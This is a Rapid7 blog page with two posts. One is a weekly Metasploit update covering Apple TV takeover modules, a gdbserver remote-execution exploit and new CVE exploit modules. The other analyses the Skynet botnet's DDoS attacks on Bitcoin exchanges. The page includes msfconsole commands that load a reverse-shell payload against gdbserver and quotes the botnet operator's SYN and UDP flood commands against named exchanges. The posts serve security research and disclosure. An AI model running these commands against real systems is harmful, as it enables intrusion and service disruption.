Rapid7 Blog


Weekly Metasploit Update: Apple, GDB, and Dogecoin

Apple TV Tricks This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's…

Apple TV Tricks This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's Chromecast, a similar chunk of consumer hardware, and we didn't want Google to think we were picking on them. Secondly, these aren't just devices that live in people's living rooms. Apple TV has some level of marketing and presence in conference rooms -- in fact, there's literally a "Conference Room" display mode. This means that these devices, which are cheap (under $100 typically) and ubiquitous (at least, Apple hopes so), have a presence on many companies' networks, and almost certainly without any kind of formal IT control or asset management or anything like that. Finally, the access security is basically non-existent. By default, Apple TV devices have no password. If you want some security, you're likely to pick the "OnScreen" mode, where the TV screen displays a four-digit PIN which you are supposed to key into your streaming device (or Metasploit module). Of course, that's trivially bruteforced. Rarely, you'll find an Apple TV device set up with a proper password. What's the risk? Well, if the display is in some public location, and is being used for Serious Business(tm), a prankster can of course cause all kind of hijinks, from obvious (fill in your own shocking WTF image here), to subtle (how about quietly replacing one financial results spreadsheet with another, on the fly)? Ultimately, though, we hope that research like this just brings some awareness to the coming Internet-of-Things and how we're apparently about to have tons and tons of these not-computer computers on our networks, just begging to be entry points for evil-doers. If Apple and Google, who are massive players in this IoT space, can't be bothered to engineer in some kind of sensible and user-friendly security-by-design on these things, how can we possibly expect newcomers with the next big IoT fad to fare any better? The GDB Protocol Last week, we added a new exploit module, "GDB Server Remote Payload Execution". If you've ever scanned a network full of developers, you might discover gdbserver, an unauthenticated remote service that allows developers to debug code in their kernel or on a different machine. Because of the nature of gdbserver, getting a shell is pretty straightforward - write a payload somewhere in RWX memory and execute. To make things easier for a pentester, we implemented a few parts of the gdbserver protocol in the Msf::Exploit::Remote::Gdb mixin, so any module can leverage it. There are lots of ways to get a shell from gdbserver, and there are lots of options that the remote service may or may not support. In addition, the service might be an independent gdbserver binary running on the remote (possibly not even attached to a program), or it might be a "remote stub" that is compiled into an application or kernel. Stubs usually support only a minimal set of features, so we made sure that the exploit module only used features in the required set. The exploit is pretty flexible: it discovers $PC, writes the payload, and continues execution. This is a rather destructive approach (since the original program will have memory contents overwritten), but since it is gdbserver we at least won't crash the target - just hang it if an interrupt or exception is thrown. Here's how to run the module against an arbitrary X86 linux box: msf> use exploits/multi/gdb/gdb_server_exec msf> set payload linux/x86/shell_reverse_tcp msf> set LHOST msf> run Right now, X86 and X86_64 targets (of any platform) are supported, but it would be very easy to extend to other architectures. Feel free to do so! Hack my Dogecoin (Such Doxing. Wow.) This week, my DEF CON interview with Alicia Mae Webb went up on SecureNinjaTV. Feel free to watch the whole thing, in which I talk about how great the Metasploit open source community is and then demo the infamous addJavascriptInterface vulnerability on a very popular browser available today on the Google Play store. I'm really kind of annoyed that this bug is so long-lived. While it's apparently been blocked in the very latest Android 4.4.4 (according to Android Tamer), it's basically a backdoor for any sub-4.4.4 Android version out there today -- that's at least 75% of all Android devices (anyone running less than 4.4). Android 4.4.4 was posted in mid-June of 2014, but of course, not all carriers have picked it up yet, and not all eligible users have updated. Be sure to check if you can pick it up by using your phone's usual over-the-air (OTA) update process. Alternatively, don't pay any attention to that bit at all, and just skip ahead to about the 9:40 mark and watch as I disclose my own Dogecoin wallet private key. Yes, it's encrypted, but a careful transcriber of the shown characters should be able to crack the password pretty quickly, given the right bruteforcing techniques. So, take this as a challenge: if you can crack my private key, feel free to take the Dogecoin as a reward, and even better, let me (and the rest of the world) know how you did it. I'm curious what approach you take. Which reminds me, I need to update Metasploit's Bitcoin Jacker to be more cryptocurrency (and host OS) agnostic. New Modules Including the modules discussed above, we have nine new modules this week. In fact, this week, we surpassed 1337 exploits! That's fun. Exploit modules Railo Remote File Include by Bryan Alexander and bperry exploits CVE-2014-5468 GDB Server Remote Payload Execution by joev ManageEngine Eventlog Analyzer Arbitrary File Upload by Pedro Ribeiro and h0ng10 exploits CVE-2014-6037 SolarWinds Storage Manager Authentication Bypass by juan vazquez and rgod exploits ZDI-14-299 ManageEngine Desktop Central StatusUpdate Arbitrary File Upload by Pedro Ribeiro exploits CVE-2014-5005 Auxiliary and post modules Apple TV Image Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708 Apple TV Video Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708 AppleTV AirPlay Login Utility by 0a29406d9794e4f9b30b3c5d6702c708 and thelightcosine Android Open Source Platform (AOSP) Browser UXSS by joev and Rafay Baloch exploits CVE-2014-6041 Arris DG950A Cable Modem Wifi Enumeration by Deral "Percent_X" Heiland If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Botnets and the War on Bitcoin

If you've been reading the most recent news from the interwebs, you probably heard that Bitcoin is on a rollercoaster. If you're not familiar with it, Bitcoin is a global online currency, the cash of the Internet. It has no central regulator and no authority:…

If you've been reading the most recent news from the interwebs, you probably heard that Bitcoin is on a rollercoaster. If you're not familiar with it, Bitcoin is a global online currency, the cash of the Internet. It has no central regulator and no authority: it's a decentralized system where technology is in control. Bitcoins are generated by the people part of its network. Generating, or better "mining", Bitcoins requires your computer to perform an expensive cryptographic computation that, combined with a proof-of-work system, ensures that the user spent a certain amount of time and CPU power for each new coin. The global availability of Bitcoins affects the difficulty and cost of performing such computations. In this way Bitcoin regulates its own growth and distribution in the same way that we do with other limited resources such as gold and silver. Bitcoin is controversial. It's an independent currency that no government or legal authority has control over, making it an interesting technological, social and economical experiment of the last years. However, it's also an investment: people are buying and selling Bitcoins all the time on stock exchanges like every other traditional currency. As a consequence, an arms race started with people clustering GPU and FPGA boards to be able to mine at a higher rate and sell the Bitcoins to make an actual profit. Over the last two years, this approach drew the attention of cybercrooks who started using their botnets to run Bitcoin miners and introduce an additional source of income to their business. Some of the most recent botnets include ZeroAccess and Skynet, but there are many more that are following the lead, such as the one very recently uncovered by Kaspersky. In the last few days, Bitcoin hit an historical record: it grew to a value of almost $270 each, an unprecedented and very promising result for the future of this currency. Then something suddenly happened: it dropped drastically and at the time of writing it floats around $75. You can see it in the following graph: The value of the currency is determined by its popularity and its availability. The reason for the drop might be caused by a sudden increase in the availability of coins. There are several Bitcoin exchanges, of smaller and larger size. In the last few days Mt. Gox, the largest existing exchange, suffered some issues originally attributed to a DDoS attack and later attributed to a large and unexpected growth of their user base, and the amount of transactions they found themselves handling. As a result of panic caused by the unavailability or slowness of the website, their users rushed into selling their Bitcoins and "cashing out", affecting the stability of the currency's value. Can you see the issue here? There's a door open for speculation. If someone would have the power to affect the stability of Bitcoin exchange, they could force its users to sell their coins, buy them at a lower price and wait for the value to grow up again before selling them and making a profit. In this scenario a DDoS would sound reasonable. Haaave you met Skynet? We talked about this botnet and his colorful operator quite some months ago. No, he didn't stop operating his botnet as much as we didn't stop tracking it and occasionally engaging in friendly conversations with him on Twitter. ![](/content/images/post-images/15971/Screen Shot 2013-04-10 at 11.47.22 PM.png) Apparently the Operator understood the influence he might have just in the same way as I described, and very recently started launching UDP and SYN flooding DDoS attacks against the Bitcoin exchangers VirWox, BitFloor and Mt. Gox. Following are DDoS commands issued by the operator in the very last days: 21:59 < suda> !udp 53 1000 1100 100 60 22:03 < suda> !udp 53 1000 1100 100 180 22:31 < suda> !syn bitfloor.com 443 100 60 03:36 < suda> !syn bitfloor.com 443 100 30 03:44 < suda> !syn bitfloor.com 443 100 5 03:52 < suda> !syn bitfloor.com 443 100 1 04:06 < suda> !syn bitfloor.com 443 1000 1 17:05 < suda> !syn mtgox.com 443 100 10 17:06 < suda> !syn mtgox.com 443 10 5 17:22 < suda> !syn bitfloor.com 443 1000 1 The owners of BitFloor lamented the issue as well: Skynet guy, that is not cool . Bitcoin is a very interesting initiative, though it is encountering multiple obstacles along its way. It's usability issues will probably prevent it from going mainstream and leave the space free for Google Wallet and other similar services. However, it's fundamental structure leaves it open for abuses and speculations by botnet operators, who can possibly influence the market in their favor and destabilize Bitcoin's economics. The fact that cybercriminals can be so instrumental in the fluctuation of the currency leaves me wondering whether they could effectively compromise the reliability of the system and undermine the ongoing investment efforts from the Bitcoin community. We are actively looking at malware and botnets abusing Bitcoin, if you encounter anything interesting please email me or tweet @botherder, sharing is caring!

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More


Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now


Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now